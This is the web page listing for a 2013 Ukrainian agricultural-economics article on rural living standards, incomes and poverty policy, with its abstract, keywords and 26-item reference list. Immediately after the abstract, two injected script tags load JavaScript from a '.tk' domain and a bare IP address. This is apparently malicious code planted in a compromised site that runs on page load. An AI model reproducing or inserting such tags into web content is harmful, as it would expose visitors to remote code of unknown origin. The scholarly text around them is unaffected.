ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.43:331.2-058.232.6
Інноваційна діяльність та інтелектуальний капітал

Матеріальний добробут сільського населення: трудові виміри та особливості регулювання / Василенька Н. І. // Економіка АПК. - 2013. - № 7 - С. 105

Проаналізовано економічні, соціальні та трудові аспекти формування рівня життя сільського населення. Обґрунтовано тісну взаємозалежність трудової реалізації людей із формуванням рівня їхнього життя, здійснено оцінку структури доходів і рівня споживання у міських та сільських домогосподарствах. Проаналізовано вплив соціальних допомог і виплат по безробіттю на трудову мотивацію сільського населення, оцінено стан розвитку соціальної сфери у сільських регіонах та її вплив на рівень життя селян. Запропоновано заходи щодо підвищення рівня життя сільського населення через його трудову реалізацію на сільському ринку праці, проведено аналіз окремих законодавчих актів у контексті їх впливу на рівень матеріального добробуту сільського населення. Дано оцінку державній політиці подолання бідності на селі й векторам впливу державних суб’єктів управління на рівень матеріального забезпечення сільських сімей. Наголошено на пріоритетності розвитку сільського господарства та агробізнесу для формування передумов підвищення рівня життя сільського населення, запропоновано напрями щодо його поліпшення. Табл.: 1. Бібліогр.: 26.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: рівень життя, матеріальний добробут, бідність, доходи, споживання, сільське населення, трудовий потенціал

Список використаних джерел

 1. Бугуцький О.А. Соціально-трудовий потенціал аграрної економіки / О.А. Бугуцький. – К. : УААН, Інститут аграрної економіки, 1996. – 228 с.
 2. Булавка О.Г. Соціалізація трудових ресурсів як передумова удосконалення зайнятості / О.Г. Булавка, Н.В. Германюк // Економіка АПК.– 2011. – № 7. – С. 129.
 3. Державна служба статистики України [Електронний ресурс]. – Режим доступу : http://www.ukrstat.gov.ua/.
 4. Державний класифікатор соціальних стандартів та нормативів [Електронний ресурс]. – Режим доступу: zakon.nau.ua.
 5. Дієсперов В.С. Оплата сільськогосподарської праці / В.С. Дієсперов // Економіка АПК.– 2012. – № 9. – С.76-83.
 6. Закон України «Про сільськогосподарську дорадчу діяльність». [Електронний ресурс]. – Режим доступу: http://zakon2.rada.gov.ua/laws/show/1807-15.
 7. Закон України «Про державні соціальні стандарти та державні соціальні гарантії» [Електронний ресурс]. – Режим доступу : zakon.rada.gov.ua/laws/show/2017-14.
 8. ЗаконУкраїни«Промежумалозабезпеченості»[Електроннийресурс].–Режимдоступу: zakon.rada.gov.ua/laws/show/190/94-вр.
 9. Закон України «Про основні засади державної аграрної політики на період до 2015 року» [Електронний ресурс]. – Режим доступу : zakon.rada.gov.ua/laws/show/2982-15.
 10. Закон України «Про особисте селянське господарство» [Електронний ресурс]. – Режим доступу: http://zakon4.rada.gov.ua/laws/show/742-15.
 11. ЗаконУкраїни«Пропрожитковиймінімум»[Електроннийресурс].–Режимдоступу: zakon.rada.gov.ua/go/966-14.
 12. Калетнік Г.М. Соціо-економічне становище населення та його вплив на формування продовольчої безпеки / Г. М Калетнік, Г.О. Пчелянська // Економіка АПК.– 2011. – № 7. – С. 38.
 13. Коротич О.Б. Розвиток України в напрямі досягнення європейських стандартів життя [Електронний ресурс] / О.Б. Коротич. – Режим доступу: http://www.nbuv.gov.ua/e-journals/DeBu/2006-1/doc/5/04.pdf .
 14. Малиновський А.С. Роль ініціативи громади в розвитку сільських територій / А. С. Малиновський // Економіка АПК.– 2012. – №9. – С.70-76.
 15. Проблеми та перспективи розвитку сільських територій України (на прикладі Карпатського регіону): науковоаналітична доп. / [В. В. Борщевський, Х. М. Притула, В. Є. Крупін, І. М. Куліш]; НАН України. Інститут регіональних досліджень. – Львів, 2011. – 60 с.
 16. Прокопа І. Сільські території України : дослідження і регулювання розвитку / І. Прокопа // Економіка України. – 2007. – №6. – С. 5-59.
 17. Рябоконь В.П. Вплив соціально-економічних чинників на стабілізацію кадрів у сільському господарстві / В.П Рябоконь // Економіка АПК.– 2011. – № 12. – С. 21.
 18. Рябоконь В.П. Соціально-економічна сутність аграрної політики та шляхи її реалізації / В.П. Рябоконь // Економіка АПК.– 2011. – №6. – С.4.
 19. Сільський сектор України на межі тисячоліть : У 2-х т. – Т. 2. Соціальні ресурси сільських територій / Л.О. Шепотько, І.В. Прокопа, С.О. Гудзинський та ін. – К. : Ін-т Економіки НАН України, 2003. – 466 с.
 20. Соціальні індикатори рівня життя сільського населення : стат. зб. – К., 2012 . – 204 с.
 21. Шляхи підвищення рівня життя сільського населення в Україні [за ред. Р. Шмідта] [Електронний ресурс]. – Режим доступу : http://icp.org.ua.
 22. Юрчишин В.В. Село і селяни України в системі історично і суспільно зумовлених вітчизняних національних цінностей / В.В. Юрчишин // Економіка АПК. – 2011. – № 3. – С. 112.
 23. Якуба К.І. Управління трудовими ресурсами села / К.І. Якуба // Управління комплексним розвитком агропромислового виробництва і сільських територій / [за ред. П.Т. Саблука, М.Ф. Кропивка]. – К. : ННЦ ІАЕ, 2011. – С. 193-205.
 24. Ярова В.В. Проблеми легалізації доходів населення / В.В. Ярова // Економіка АПК.– 2011. – № 12. – С. 57-62.
 25. Каlinowski S. Poziom życia ludnosci wiejskiej w Polsce / S. Каlinowski, B. Kielbasa // Roczniki naykove Stowarzyszenia economistow rolnictwa i agrobiznesu. – T. XIV, Z.4, – Warszaw-Poznan-Biawystok, 2012. – S. 50-54.
 26. Michalska S. Zrównoważony rozwój obszarów wiejskich a różnicujące się warunki życia mieszkańców wsi / S. Michalska, M. Błąd, D. Klepacka-Kołodziejska (red.) // Społeczno-ekonomiczne aspekty rozwoju polskiej wsi. – Warszawa : IRWiR PAN, 2007. – S. 111–120.
Читати статтю: 13_07_105-112.pdf